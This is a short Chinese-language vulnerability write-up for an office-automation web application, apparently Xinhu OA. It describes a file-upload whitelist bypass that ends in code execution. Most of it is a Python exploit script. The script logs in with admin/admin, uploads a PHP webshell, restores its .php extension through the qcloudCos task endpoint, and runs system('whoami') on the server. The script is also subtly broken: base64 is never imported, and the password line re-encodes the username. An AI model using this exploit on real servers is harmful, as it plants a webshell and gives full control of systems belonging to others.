原理

文件上传点存在一个白名单，在白名单之外的内容会被添加后缀并base64编码文件内容，编码后的文件会获得一个id，通过webmain/task/runt/qcloudCosAction.php中的qcloudCosAction类的run方法，提供对应的id即可复原后缀和内容，从而导致上传的文件被解析。

危害

攻击者可获得系统的完整访问权限。

POC & EXP

import requests


session = requests.session()

url_pre = 'http://x.x.x.x/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

username = 'admin' # OA用户名
username = encoded_username = base64.b64encode(username.encode('utf-8')).decode('utf-8')
password = 'admin' # OA用户密码
username = encoded_username = base64.b64encode(username.encode('utf-8')).decode('utf-8')

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': username,
    'adminpass': password,
    'yanzm': ''
}


r = session.post(url1, data=data1)
file = open('shell.php', 'r+') # 读取shell文件
r = session.post(url2, files={'file': file})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
data2 = {
    'AHtest': 'system(\'whoami\')',
}
r = session.post(url_pre + filepath, data=data2)
print(r.text)